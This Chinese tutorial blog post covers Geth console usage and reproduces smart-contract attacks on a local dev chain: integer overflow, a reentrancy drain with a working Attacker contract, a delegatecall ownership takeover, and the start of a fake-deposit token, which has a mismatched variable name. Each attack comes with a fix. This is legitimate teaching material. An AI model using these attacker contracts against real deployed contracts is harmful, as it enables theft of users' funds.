以太坊客户端Geth基本 *** 作和10个单链攻击及其防护方法复现

以太坊客户端Geth基本 *** 作和10个单链攻击及其防护方法复现,第1张

文章目录 常用web3指令添加新账户查询账户余额定义变量解锁账户转账设置当前调用函数的账户调用函数调用sendTransaction类型函数的方法调用call类型函数的方法 账户地址 启动geth几个攻击复现整数溢出合约部署方法部署方法1部署方法2 重入攻击部署合约时的部署账户 delegatecall漏洞部署合约时构造函数参数处理方法 假充值漏洞Rubixi漏洞CryptoRoulette攻击King of the Ether Throne攻击(DOS)部署合约时想传入msg.value即向合约转账 call-after-destruct攻击回滚攻击影子变量攻击

常用web3指令 添加新账户

personal.newAccount()

查询账户余额

(以ether为单位显示,可查合约账户):web3.fromWei(eth.getBalance(“0xfe44108f962ae9afa23699b5b7f1fa817e5b5012”),“ether”)

定义变量

var acc0=eth.accounts[0]

解锁账户

(dev模式下除了开发者账户account[0],其他账户每次使用都需要解锁一次):personal.unlockAccount(eth.accounts[1])

转账

(acc为提前定义好的变量,如果没有定义,也可以直接放地址,地址需加前后英文双引号):eth.sendTransaction({from:acc0 , to:acc1,value: web3.toWei(‘100’, ‘ether’)})

设置当前调用函数的账户

web3.eth.defaultAccount = web3.eth.accounts[0]

调用函数 调用sendTransaction类型函数的方法

(调用时不需要发送msg.value的话直接去掉value选项就好):

合约名.函数名.sendTransaction(参数列表,{from: “0xde04aeaf51781f55353ccf6511c3c82ec43bd2bb”, value: web3.toWei(‘10’, ‘ether’)})

(需要付gas的,由from:的账户付gas)

调用call类型函数的方法

合约名.函数名.call(参数列表)

账户可一直保存,在keystore文件里,其中accounts[0]是开发者账户,以太币余额无限多

账户地址

//以下为我自己的两个账户文件,方便复制粘贴

attack1数据文件:

eth.accounts[“0x2378f0b099a2c18ff2157aa9f96c5617b0241168”,

“0x910d3a7564d50311e4cdbd11bc8d9068aa9ec2f9”,

“0x5f3d8493dfce07d413bf56e3fb295116ac24cb88”,

“0x044a672165513e4a19b781acb95563d8377e7206”]

attack2数据文件:

eth.accounts

[“0xfe44108f962ae9afa23699b5b7f1fa817e5b5012”,

“0xf1837bfdfcc5be3a63e5b899cd54b69950009b07”]

attack3数据文件:

eth.accounts
[“0xb14c4c98d7adf099f940fea652955c3c9d3de021”,

“0xde04aeaf51781f55353ccf6511c3c82ec43bd2bb”]

启动geth

需要添加环境变量到/etc/profile文件末尾(路径是自己安装go-ethereum的路径下的/build/bin,我是安装在/home下的)

export PATH=$PATH:/home/go-ethereum/build/bin

geth开启开发者模式(dev模式,无需genesis.json,直接一行命令启动,在需要的时候瞬间自动出块,做实验很方便,–datadir后是数据文件存放地,建议自己新建一个,>后是log文件)

geth --datadir ./crosschain_datadir --dev console 2>output.log

可开启另一终端执行 tail -f output.log查看log 不影响做实验

几个攻击复现 整数溢出
pragma solidity ^0.4.22;
contract POC{
    function add_overflow() returns (uint256 _overflow){
        uint256 max = 2**256-1;
        return max+1;
    }
     function sub_underflow() returns (uint256 _underflow){
        uint256 min=0;
        return min-1;
    }
     function mul_overflow() returns (uint256 _overflow){
        uint256 mul= 2**255;
        return mul*2;
    }
}

合约部署方法 部署方法1

(建议采用方法1,方法2麻烦而且有点问题):

将Remix里的WEB3DEPLOY粘贴到geth console回车执行

注意事项如下:

new删除,C小写,deploy改为new,第四个红框内容删掉

处理完格式如下:

var pocContract =  web3.eth.contract([{"constant":false,"inputs":[],"name":"sub_underflow","outputs":[{"name":"_underflow","type":"uint256"}],"payable":false,"stateMutability":"nonpayable","type":"function"},{"constant":false,"inputs":[],"name":"add_overflow","outputs":[{"name":"_overflow","type":"uint256"}],"payable":false,"stateMutability":"nonpayable","type":"function"},{"constant":false,"inputs":[],"name":"mul_overflow","outputs":[{"name":"_overflow","type":"uint256"}],"payable":false,"stateMutability":"nonpayable","type":"function"}]);
var poc = pocContract.new({
     data: '0x608060405234801561001057600080fd5b5061017a806100206000396000f300608060405260043610610057576000357c0100000000000000000000000000000000000000000000000000000000900463ffffffff168063656781711461005c578063df541bdb14610087578063eb67eaa7146100b2575b600080fd5b34801561006857600080fd5b506100716100dd565b6040518082815260200191505060405180910390f35b34801561009357600080fd5b5061009c6100ee565b6040518082815260200191505060405180910390f35b3480156100be57600080fd5b506100c761011e565b6040518082815260200191505060405180910390f35b600080600090506001810391505090565b6000807fffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffff90506001810191505090565b6000807f8000000000000000000000000000000000000000000000000000000000000000905060028102915050905600a165627a7a723058200122e17839720f0ff44791ef902738f9cfb738a12e01cfe7c41ee0591c2fa9db0029', 
     
     from: web3.eth.accounts[0], 
     gas: '4700000'
   }, function (e, contract){
    console.log(e, contract);
    if (typeof contract.address !== 'undefined') {
         console.log('Contract mined! address: ' + contract.address + ' transactionHash: ' + contract.transactionHash);
    }
 })

poc即为合约实例名,可直接poc.function.call()和poc.function.sendTransaction()调用合约里的public函数

部署方法2

Remix获取ABI与Bytecode,复制下来的ABI先要转成JSON字符串,我们可以借助http://www.bejson.com/jsonviewernew/来完成

abi=[{“constant”:false,“inputs”:[],“name”:“add_overflow”,“outputs”:[{“name”:“_overflow”,“type”:“uint256”}],“payable”:false,“stateMutability”:“nonpayable”,“type”:“function”},{“constant”:false,“inputs”:[],“name”:“mul_overflow”,“outputs”:[{“name”:“_overflow”,“type”:“uint256”}],“payable”:false,“stateMutability”:“nonpayable”,“type”:“function”},{“constant”:false,“inputs”:[],“name”:“sub_underflow”,“outputs”:[{“name”:“_underflow”,“type”:“uint256”}],“payable”:false,“stateMutability”:“nonpayable”,“type”:“function”}]

bytecode只取object并在开头加0x,和前后双引号

如bytecode=“0x608060405234801561001057600080fd5b5061017a806100206000396000f300608060405260043610610057576000357c0100000000000000000000000000000000000000000000000000000000900463ffffffff168063656781711461005c578063df541bdb14610087578063eb67eaa7146100b2575b600080fd5b34801561006857600080fd5b506100716100dd565b6040518082815260200191505060405180910390f35b34801561009357600080fd5b5061009c6100ee565b6040518082815260200191505060405180910390f35b3480156100be57600080fd5b506100c761011e565b6040518082815260200191505060405180910390f35b600080600090506001810391505090565b6000807fffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffff90506001810191505090565b6000807f8000000000000000000000000000000000000000000000000000000000000000905060028102915050905600a165627a7a72305820d975a068c2325dff8d7edba9b606edab44e133fecaa0fe1792ebf57070f4d9450029”

contract = eth.contract(abi);
eth.estimateGas({data: bytecode})//预估gas费
initializer = {from: web3.eth.accounts[0], data: bytecode, gas: 140000};//gas取比预估出来的大一些就行
token = contract.new(initializer)//token即为合约实例,可以直接调用合约里的函数
web3.eth.defaultAccount = web3.eth.accounts[0]	//初始化设置,dev模式不需要

mycontract = contract.at(token.address)	//上链后可直接使用token进行合约调用,但重启geth后需用此语句重新实例化。

mycontract.function()	//调用

防护:

pragma solidity ^0.4.22;
contract POC{

    function mul(uint256 a, uint256 b) internal pure returns (uint256) {
        // Gas optimization: this is cheaper than requiring 'a' not being zero, but the
        // benefit is lost if 'b' is also tested.
        // See: https://github.com/OpenZeppelin/openzeppelin-solidity/pull/522
        if (a == 0) {
            return 0;
        }
 
        uint256 c = a * b;
        require(c / a == b);
 
        return c;
    }
 
    /**
     * @dev Integer division of two unsigned integers truncating the quotient, reverts on division by zero.
     */
    function div(uint256 a, uint256 b) internal pure returns (uint256) {
        // Solidity only automatically asserts when dividing by 0
        require(b > 0);
        uint256 c = a / b;
        // assert(a == b * c + a % b); // There is no case in which this doesn't hold
 
        return c;
    }
 
    /**
     * @dev Subtracts two unsigned integers, reverts on overflow (i.e. if subtrahend is greater than minuend).
     */
    function sub(uint256 a, uint256 b) internal pure returns (uint256) {
        require(b <= a);
        uint256 c = a - b;
 
        return c;
    }
 
    /**
     * @dev Adds two unsigned integers, reverts on overflow.
     */
    function add(uint256 a, uint256 b) internal pure returns (uint256) {
        uint256 c = a + b;
        require(c >= a);
 
        return c;
    }
 
    /**
     * @dev Divides two unsigned integers and returns the remainder (unsigned integer modulo),
     * reverts when dividing by zero.
     */
    function mod(uint256 a, uint256 b) internal pure returns (uint256) {
        require(b != 0);
        return a % b;
    }
    uint256 a;

    function add_overflow() returns (uint256 a){
        uint256 max = 2**256-1;
        return add(max,1);
    }
     function sub_underflow() returns (uint256 b){
        uint256 min=0;
        return sub(min,1);
    }
     function mul_overflow() returns (uint256 c){
        uint256 mulamount= 2**255;
        return mul(mulamount,2);
    }
}
var pocContract =web3.eth.contract([{"constant":false,"inputs":[],"name":"sub_underflow","outputs":[{"name":"b","type":"uint256"}],"payable":false,"stateMutability":"nonpayable","type":"function"},{"constant":false,"inputs":[],"name":"add_overflow","outputs":[{"name":"a","type":"uint256"}],"payable":false,"stateMutability":"nonpayable","type":"function"},{"constant":false,"inputs":[],"name":"mul_overflow","outputs":[{"name":"c","type":"uint256"}],"payable":false,"stateMutability":"nonpayable","type":"function"}]);
var poc = pocContract.new({
     data: '0x608060405234801561001057600080fd5b5061020f806100206000396000f300608060405260043610610057576000357c0100000000000000000000000000000000000000000000000000000000900463ffffffff168063656781711461005c578063df541bdb14610087578063eb67eaa7146100b2575b600080fd5b34801561006857600080fd5b506100716100dd565b6040518082815260200191505060405180910390f35b34801561009357600080fd5b5061009c6100f5565b6040518082815260200191505060405180910390f35b3480156100be57600080fd5b506100c761012c565b6040518082815260200191505060405180910390f35b600080600090506100ef816001610163565b91505090565b6000807fffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffff9050610126816001610184565b91505090565b6000807f8000000000000000000000000000000000000000000000000000000000000000905061015d8160026101a5565b91505090565b60008083831115151561017557600080fd5b82840390508091505092915050565b600080828401905083811015151561019b57600080fd5b8091505092915050565b60008060008414156101ba57600091506101dc565b82840290508284828115156101cb57fe5b041415156101d857600080fd5b8091505b50929150505600a165627a7a723058207f4a52a857f643b644c7648069e5343fe42425f1af7e81060719cde23d4072990029', 
    
     from: web3.eth.accounts[0], 
     gas: '4700000'
   }, function (e, contract){
    console.log(e, contract);
    if (typeof contract.address !== 'undefined') {
         console.log('Contract mined! address: ' + contract.address + ' transactionHash: ' + contract.transactionHash);
    }
 })
重入攻击
pragma solidity ^0.4.19;
 
contract Victim {
    mapping(address => uint) public userBalannce;
    uint public amount = 0;
    function Victim() payable{}
    function withDraw(){
        uint amount = userBalannce[msg.sender];
        if(amount > 0){
            msg.sender.call.value(amount)();
            userBalannce[msg.sender] = 0;
        }
    }
    function() payable{}
    function receiveEther() payable{
        if(msg.value > 0){
            userBalannce[msg.sender] += msg.value;
        }
    }
     function showAccount() public returns (uint){
        amount = this.balance;
        return this.balance;
    }
}
 
contract Attacker{
    uint public amount = 0;
    uint public test = 0;
    function Attacker() payable{}
    function() payable{
        test++;
        Victim(msg.sender).withDraw();
    }
    function showAccount() public returns (uint){
        amount = this.balance;
        return this.balance;
    }
    function sendMoney(address addr){
        Victim(addr).receiveEther.value(1 ether)();
    }
    function reentry(address addr){
        Victim(addr).withDraw();
    }
}

部署合约时的部署账户

即为from: web3.eth.accounts[0]处的账户,如果是accounts[0]之外的账户,则需要先解锁一次再部署

var victimContract =  web3.eth.contract([{"constant":false,"inputs":[],"name":"withDraw","outputs":[],"payable":false,"stateMutability":"nonpayable","type":"function"},{"constant":false,"inputs":[],"name":"receiveEther","outputs":[],"payable":true,"stateMutability":"payable","type":"function"},{"constant":false,"inputs":[],"name":"showAccount","outputs":[{"name":"","type":"uint256"}],"payable":false,"stateMutability":"nonpayable","type":"function"},{"constant":true,"inputs":[],"name":"amount","outputs":[{"name":"","type":"uint256"}],"payable":false,"stateMutability":"view","type":"function"},{"constant":true,"inputs":[{"name":"","type":"address"}],"name":"userBalannce","outputs":[{"name":"","type":"uint256"}],"payable":false,"stateMutability":"view","type":"function"},{"inputs":[],"payable":true,"stateMutability":"payable","type":"constructor"},{"payable":true,"stateMutability":"payable","type":"fallback"}]);
var victim = victimContract.new({
     data: '0x606060405260006001556102d1806100186000396000f30060606040526004361061006d576000357c0100000000000000000000000000000000000000000000000000000000900463ffffffff1680630fdb1c101461006f578063a3912ec814610084578063a657bbcc1461008e578063aa8c217c146100b7578063c30f76a6146100e0575b005b341561007a57600080fd5b61008261012d565b005b61008c6101f2565b005b341561009957600080fd5b6100a161024a565b6040518082815260200191505060405180910390f35b34156100c257600080fd5b6100ca610287565b6040518082815260200191505060405180910390f35b34156100eb57600080fd5b610117600480803573ffffffffffffffffffffffffffffffffffffffff1690602001909190505061028d565b6040518082815260200191505060405180910390f35b60008060003373ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff16815260200190815260200160002054905060008111156101ef573373ffffffffffffffffffffffffffffffffffffffff168160405160006040518083038185876187965a03f1925050505060008060003373ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff168152602001908152602001600020819055505b50565b600034111561024857346000803373ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff168152602001908152602001600020600082825401925050819055505b565b60003073ffffffffffffffffffffffffffffffffffffffff16316001819055503073ffffffffffffffffffffffffffffffffffffffff1631905090565b60015481565b600060205280600052604060002060009150905054815600a165627a7a72305820f1e75a84b04036d1d187bf80017a92183e9104b5a2f01fa9ba1baee661d5693a0029', 
    
     from: web3.eth.accounts[0], 
     gas: '4700000'
   }, function (e, contract){
    console.log(e, contract);
    if (typeof contract.address !== 'undefined') {
         console.log('Contract mined! address: ' + contract.address + ' transactionHash: ' + contract.transactionHash);
    }
 })
 

Contract mined! address: 0x58c4688b17b24831103a25344f01812f62e711bd transactionHash: 0x5ee74325304fc8c7688a8504ba774524d382bbbec15033a3677332b0cd0e0701

第二个合约Attacker:

var attackerContract = web3.eth.contract([{"constant":false,"inputs":[{"name":"addr","type":"address"}],"name":"sendMoney","outputs":[],"payable":false,"stateMutability":"nonpayable","type":"function"},{"constant":false,"inputs":[{"name":"addr","type":"address"}],"name":"reentry","outputs":[],"payable":false,"stateMutability":"nonpayable","type":"function"},{"constant":false,"inputs":[],"name":"showAccount","outputs":[{"name":"","type":"uint256"}],"payable":false,"stateMutability":"nonpayable","type":"function"},{"constant":true,"inputs":[],"name":"amount","outputs":[{"name":"","type":"uint256"}],"payable":false,"stateMutability":"view","type":"function"},{"constant":true,"inputs":[],"name":"test","outputs":[{"name":"","type":"uint256"}],"payable":false,"stateMutability":"view","type":"function"},{"inputs":[],"payable":true,"stateMutability":"payable","type":"constructor"},{"payable":true,"stateMutability":"payable","type":"fallback"}]);
var attacker = attackerContract.new({
     data: '0x60606040526000805560006001556103578061001c6000396000f30060606040526004361061006d576000357c0100000000000000000000000000000000000000000000000000000000900463ffffffff168063338ccd78146100f85780633c04ec3314610131578063a657bbcc1461016a578063aa8c217c14610193578063f8a8fd6d146101bc575b6001600081548092919060010191905055503373ffffffffffffffffffffffffffffffffffffffff16630fdb1c106040518163ffffffff167c0100000000000000000000000000000000000000000000000000000000028152600401600060405180830381600087803b15156100e257600080fd5b6102c65a03f115156100f357600080fd5b505050005b341561010357600080fd5b61012f600480803573ffffffffffffffffffffffffffffffffffffffff169060200190919050506101e5565b005b341561013c57600080fd5b610168600480803573ffffffffffffffffffffffffffffffffffffffff16906020019091905050610268565b005b341561017557600080fd5b61017d6102e2565b6040518082815260200191505060405180910390f35b341561019e57600080fd5b6101a661031f565b6040518082815260200191505060405180910390f35b34156101c757600080fd5b6101cf610325565b6040518082815260200191505060405180910390f35b8073ffffffffffffffffffffffffffffffffffffffff1663a3912ec8670de0b6b3a76400006040518263ffffffff167c01000000000000000000000000000000000000000000000000000000000281526004016000604051808303818588803b151561025057600080fd5b6125ee5a03f1151561026157600080fd5b5050505050565b8073ffffffffffffffffffffffffffffffffffffffff16630fdb1c106040518163ffffffff167c0100000000000000000000000000000000000000000000000000000000028152600401600060405180830381600087803b15156102cb57600080fd5b6102c65a03f115156102dc57600080fd5b50505050565b60003073ffffffffffffffffffffffffffffffffffffffff16316000819055503073ffffffffffffffffffffffffffffffffffffffff1631905090565b60005481565b600154815600a165627a7a72305820753a8a0e16fb81fadedc67369e096e1105f147c5cdf7524a296c9b9fc5946bc40029', 
   
     from: web3.eth.accounts[0], 
     gas: '4700000',
     value:10000000000000000000
   }, function (e, contract){
    console.log(e, contract);
    if (typeof contract.address !== 'undefined') {
         console.log('Contract mined! address: ' + contract.address + ' transactionHash: ' + contract.transactionHash);
    }
 })

Contract mined! address: 0xc852dadfa72c66c479d3b45672bb7cd50bbad658 transactionHash: 0xb348fd2e63bebfac65e7494cda20ebaf28fe4dc445898694dd7b3e187251a1f0

防护:

pragma solidity ^0.4.19;
 
contract Victim {
    mapping(address => uint) public userBalannce;
    uint public amount = 0;
    function Victim() payable{}
    function withDraw(){
        uint amount = userBalannce[msg.sender];
        if(amount > 0){
            
            userBalannce[msg.sender] = 0;
            msg.sender.call.value(amount)();
        }
    }
    function() payable{}
    function receiveEther() payable{
        if(msg.value > 0){
            userBalannce[msg.sender] += msg.value;
        }
    }
     function showAccount() public returns (uint){
        amount = this.balance;
        return this.balance;
    }
}
 
contract Attacker{
    uint public amount = 0;
    uint public test = 0;
    function Attacker() payable{}
    function() payable{
        test++;
        Victim(msg.sender).withDraw();
    }
    function showAccount() public returns (uint){
        amount = this.balance;
        return this.balance;
    }
    function sendMoney(address addr){
        Victim(addr).receiveEther.value(1 ether)();
    }
    function reentry(address addr){
        Victim(addr).withDraw();
    }
}

var victimContract = web3.eth.contract([{"constant":false,"inputs":[],"name":"withDraw","outputs":[],"payable":false,"stateMutability":"nonpayable","type":"function"},{"constant":false,"inputs":[],"name":"receiveEther","outputs":[],"payable":true,"stateMutability":"payable","type":"function"},{"constant":false,"inputs":[],"name":"showAccount","outputs":[{"name":"","type":"uint256"}],"payable":false,"stateMutability":"nonpayable","type":"function"},{"constant":true,"inputs":[],"name":"amount","outputs":[{"name":"","type":"uint256"}],"payable":false,"stateMutability":"view","type":"function"},{"constant":true,"inputs":[{"name":"","type":"address"}],"name":"userBalannce","outputs":[{"name":"","type":"uint256"}],"payable":false,"stateMutability":"view","type":"function"},{"inputs":[],"payable":true,"stateMutability":"payable","type":"constructor"},{"payable":true,"stateMutability":"payable","type":"fallback"}]);
var victim = victimContract.new({
     data: '0x606060405260006001556102d1806100186000396000f30060606040526004361061006d576000357c0100000000000000000000000000000000000000000000000000000000900463ffffffff1680630fdb1c101461006f578063a3912ec814610084578063a657bbcc1461008e578063aa8c217c146100b7578063c30f76a6146100e0575b005b341561007a57600080fd5b61008261012d565b005b61008c6101f2565b005b341561009957600080fd5b6100a161024a565b6040518082815260200191505060405180910390f35b34156100c257600080fd5b6100ca610287565b6040518082815260200191505060405180910390f35b34156100eb57600080fd5b610117600480803573ffffffffffffffffffffffffffffffffffffffff1690602001909190505061028d565b6040518082815260200191505060405180910390f35b60008060003373ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff16815260200190815260200160002054905060008111156101ef5760008060003373ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff168152602001908152602001600020819055503373ffffffffffffffffffffffffffffffffffffffff168160405160006040518083038185876187965a03f192505050505b50565b600034111561024857346000803373ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff168152602001908152602001600020600082825401925050819055505b565b60003073ffffffffffffffffffffffffffffffffffffffff16316001819055503073ffffffffffffffffffffffffffffffffffffffff1631905090565b60015481565b600060205280600052604060002060009150905054815600a165627a7a7230582083520b9aa083b8c447a87d1578798f789b47a05589db7d6d54a27daf3928e95c0029', 
     from: web3.eth.accounts[0], 
     gas: '4700000',
     value:25000000000000000000
   }, function (e, contract){
    console.log(e, contract);
    if (typeof contract.address !== 'undefined') {
         console.log('Contract mined! address: ' + contract.address + ' transactionHash: ' + contract.transactionHash);
    }
 })

Contract mined! address: 0xafe0d2de59b350c1ae67b3238f9697c6be32275e transactionHash: 0x3fa4e24bfc1510ae78d029ebf628524ceb313688c9262bb7c69b69480001e367

var attackerContract = web3.eth.contract([{"constant":false,"inputs":[{"name":"addr","type":"address"}],"name":"sendMoney","outputs":[],"payable":false,"stateMutability":"nonpayable","type":"function"},{"constant":false,"inputs":[{"name":"addr","type":"address"}],"name":"reentry","outputs":[],"payable":false,"stateMutability":"nonpayable","type":"function"},{"constant":false,"inputs":[],"name":"showAccount","outputs":[{"name":"","type":"uint256"}],"payable":false,"stateMutability":"nonpayable","type":"function"},{"constant":true,"inputs":[],"name":"amount","outputs":[{"name":"","type":"uint256"}],"payable":false,"stateMutability":"view","type":"function"},{"constant":true,"inputs":[],"name":"test","outputs":[{"name":"","type":"uint256"}],"payable":false,"stateMutability":"view","type":"function"},{"inputs":[],"payable":true,"stateMutability":"payable","type":"constructor"},{"payable":true,"stateMutability":"payable","type":"fallback"}]);
var attacker = attackerContract.new({
     data: '0x60606040526000805560006001556103578061001c6000396000f30060606040526004361061006d576000357c0100000000000000000000000000000000000000000000000000000000900463ffffffff168063338ccd78146100f85780633c04ec3314610131578063a657bbcc1461016a578063aa8c217c14610193578063f8a8fd6d146101bc575b6001600081548092919060010191905055503373ffffffffffffffffffffffffffffffffffffffff16630fdb1c106040518163ffffffff167c0100000000000000000000000000000000000000000000000000000000028152600401600060405180830381600087803b15156100e257600080fd5b6102c65a03f115156100f357600080fd5b505050005b341561010357600080fd5b61012f600480803573ffffffffffffffffffffffffffffffffffffffff169060200190919050506101e5565b005b341561013c57600080fd5b610168600480803573ffffffffffffffffffffffffffffffffffffffff16906020019091905050610268565b005b341561017557600080fd5b61017d6102e2565b6040518082815260200191505060405180910390f35b341561019e57600080fd5b6101a661031f565b6040518082815260200191505060405180910390f35b34156101c757600080fd5b6101cf610325565b6040518082815260200191505060405180910390f35b8073ffffffffffffffffffffffffffffffffffffffff1663a3912ec8670de0b6b3a76400006040518263ffffffff167c01000000000000000000000000000000000000000000000000000000000281526004016000604051808303818588803b151561025057600080fd5b6125ee5a03f1151561026157600080fd5b5050505050565b8073ffffffffffffffffffffffffffffffffffffffff16630fdb1c106040518163ffffffff167c0100000000000000000000000000000000000000000000000000000000028152600401600060405180830381600087803b15156102cb57600080fd5b6102c65a03f115156102dc57600080fd5b50505050565b60003073ffffffffffffffffffffffffffffffffffffffff16316000819055503073ffffffffffffffffffffffffffffffffffffffff1631905090565b60005481565b600154815600a165627a7a723058209b92242a801d86ca4f2593daa27cbe5c9245f95aa5ec9edb34ebc96460ddca600029', 
     from: web3.eth.accounts[0], 
     gas: '4700000'
   }, function (e, contract){
    console.log(e, contract);
    if (typeof contract.address !== 'undefined') {
         console.log('Contract mined! address: ' + contract.address + ' transactionHash: ' + contract.transactionHash);
    }
 })
delegatecall漏洞
pragma solidity ^0.4.10;
contract Delegate {
    address public owner;
    function Delegate(address _owner) {
        owner = _owner;
    }
    function setOwner() {
        owner = msg.sender;
    }
}
contract Delegation {
    address public owner;
    Delegate delegate;
    function Delegation(address _delegateAddress) {
        delegate = Delegate(_delegateAddress);
        owner = msg.sender;
    }
    function () {
        if (delegate.delegatecall(bytes4(keccak256("setOwner()")))) {
            this;
        }
    }
}

第一个合约Delegate:

部署合约时构造函数参数处理方法

在WEB3DEPLOY中的前几行填入对应参数,并在contract.new(下面第3行)后面的({这两个括号之间放入定义的变量列表,以逗号分隔且最后要有个逗号,注意变量定义时address类型需加前后英文双引号

var _owner = "0x2378f0b099a2c18ff2157aa9f96c5617b0241168" ;
var delegateContract = web3.eth.contract([{"constant":false,"inputs":[],"name":"setOwner","outputs":[],"payable":false,"type":"function","stateMutability":"nonpayable"},{"constant":true,"inputs":[],"name":"owner","outputs":[{"name":"","type":"address"}],"payable":false,"type":"function","stateMutability":"view"},{"inputs":[{"name":"_owner","type":"address"}],"payable":false,"type":"constructor","stateMutability":"nonpayable"}]);
var delegate = delegateContract.new(_owner,
{
     data: '0x6060604052341561000c57fe5b6040516020806101bc833981016040528080519060200190919050505b80600060006101000a81548173ffffffffffffffffffffffffffffffffffffffff021916908373ffffffffffffffffffffffffffffffffffffffff1602179055505b505b6101408061007c6000396000f30060606040526000357c0100000000000000000000000000000000000000000000000000000000900463ffffffff16806340caae06146100465780638da5cb5b14610058575bfe5b341561004e57fe5b6100566100aa565b005b341561006057fe5b6100686100ee565b604051808273ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff16815260200191505060405180910390f35b33600060006101000a81548173ffffffffffffffffffffffffffffffffffffffff021916908373ffffffffffffffffffffffffffffffffffffffff1602179055505b565b600060009054906101000a900473ffffffffffffffffffffffffffffffffffffffff16815600a165627a7a723058207a55306717c1e8cc5fa91b9d9796fd332c150849ad0f7500db1b515f71458cfd0029', 
          
     from: web3.eth.accounts[0], 
     gas: '4700000'
   }, function (e, contract){
    console.log(e, contract);
    if (typeof contract.address !== 'undefined') {
         console.log('Contract mined! address: ' + contract.address + ' transactionHash: ' + contract.transactionHash);
    }
 })

Contract mined! address: 0x289c5b897c0b30f4962d3e39c1b8ef62dfd7b4f8 transactionHash: 0x65bb9d9488fde84f6ae526a926af64dcaf6e055f591d1dc092abfe69e701a336

第二个合约Delegation:

var _delegateAddress = "0x289c5b897c0b30f4962d3e39c1b8ef62dfd7b4f8" ;
var delegationContract = web3.eth.contract([{"constant":true,"inputs":[],"name":"owner","outputs":[{"name":"","type":"address"}],"payable":false,"type":"function","stateMutability":"view"},{"constant":false,"inputs":[],"name":"attack","outputs":[],"payable":false,"type":"function","stateMutability":"nonpayable"},{"inputs":[{"name":"_delegateAddress","type":"address"}],"payable":false,"type":"constructor","stateMutability":"nonpayable"}]);
var delegation = delegationContract.new( _delegateAddress,
{
     data: '0x6060604052341561000c57fe5b6040516020806102a8833981016040528080519060200190919050505b80600160006101000a81548173ffffffffffffffffffffffffffffffffffffffff021916908373ffffffffffffffffffffffffffffffffffffffff16021790555033600060006101000a81548173ffffffffffffffffffffffffffffffffffffffff021916908373ffffffffffffffffffffffffffffffffffffffff1602179055505b505b6101eb806100bd6000396000f30060606040526000357c0100000000000000000000000000000000000000000000000000000000900463ffffffff1680638da5cb5b146100465780639e5faafc14610098575bfe5b341561004e57fe5b6100566100aa565b604051808273ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff16815260200191505060405180910390f35b34156100a057fe5b6100a86100d0565b005b600060009054906101000a900473ffffffffffffffffffffffffffffffffffffffff1681565b600160009054906101000a900473ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff1660405180807f7365744f776e6572282900000000000000000000000000000000000000000000815250600a01905060405180910390207c010000000000000000000000000000000000000000000000000000000090046000604051602001526040518163ffffffff167c01000000000000000000000000000000000000000000000000000000000281526004018090506020604051808303818660325a03f415156101b057fe5b50505060405180519050505b5b5600a165627a7a723058203203659275a49e3debea039b634c653a12f584dc1cff9aff3872b7be66b156830029', 
   
     from: web3.eth.accounts[0], 
     gas: '4700000'
   }, function (e, contract){
    console.log(e, contract);
    if (typeof contract.address !== 'undefined') {
         console.log('Contract mined! address: ' + contract.address + ' transactionHash: ' + contract.transactionHash);
    }
 })
 
 var _delegateAddress = 0x06e1b0366ea9d22731d03e2dfffbdbcfca2796d6 ;
var delegationContract =  web3.eth.contract([{"constant":true,"inputs":[],"name":"owner","outputs":[{"name":"","type":"address"}],"payable":false,"type":"function","stateMutability":"view"},{"inputs":[{"name":"_delegateAddress","type":"address"}],"payable":false,"type":"constructor","stateMutability":"nonpayable"},{"payable":false,"type":"fallback","stateMutability":"nonpayable"}]);
var delegation = delegationContract.new(
_delegateAddress,{
     data: '0x6060604052341561000c57fe5b60405160208061029d833981016040528080519060200190919050505b80600160006101000a81548173ffffffffffffffffffffffffffffffffffffffff021916908373ffffffffffffffffffffffffffffffffffffffff16021790555033600060006101000a81548173ffffffffffffffffffffffffffffffffffffffff021916908373ffffffffffffffffffffffffffffffffffffffff1602179055505b505b6101e0806100bd6000396000f3006060604052361561003f576000357c0100000000000000000000000000000000000000000000000000000000900463ffffffff1680638da5cb5b1461013c575b341561004757fe5b61013a5b600160009054906101000a900473ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff1660405180807f7365744f776e6572282900000000000000000000000000000000000000000000815250600a01905060405180910390207c010000000000000000000000000000000000000000000000000000000090046000604051602001526040518163ffffffff167c01000000000000000000000000000000000000000000000000000000000281526004018090506020604051808303818660325a03f4151561012b57fe5b50505060405180519050505b5b565b005b341561014457fe5b61014c61018e565b604051808273ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff16815260200191505060405180910390f35b600060009054906101000a900473ffffffffffffffffffffffffffffffffffffffff16815600a165627a7a72305820d6b31560aaabb2281f6c60ab7aad2f19587c00e7225ec7cb71be82da7f6b96b70029', 

     from: web3.eth.accounts[0], 
     gas: '4700000'
   }, function (e, contract){
    console.log(e, contract);
    if (typeof contract.address !== 'undefined') {
         console.log('Contract mined! address: ' + contract.address + ' transactionHash: ' + contract.transactionHash);
    }
 })

Contract mined! address: 0xd1115e35e29b3c14e2a4091aa16026eeb19995ca transactionHash: 0xd12bccb652b818fcd3b68e34c3b7aa20a3a321be5aa16d9ebde0bb6f3d1123ea

假充值漏洞
pragma solidity ^0.4.22;

contract token1{
address owner;
uint public amount = 0;
function token1() payable {}
function() payable {}
mapping (address => uint256) balance;
function deposit1() payable {balance[msg.sender] += msg.value; }
function deposit2() payable {balance[this] += msg.value; }
function transfer(address _to, uint256 _value) public returns (bool) {
    if(_value <= balances[msg.sender] && _value > 0){
      balances[msg.sender] -= _value;
      balances[_to] += _value;
      return true;
    }
    else
        return false;
  }
}

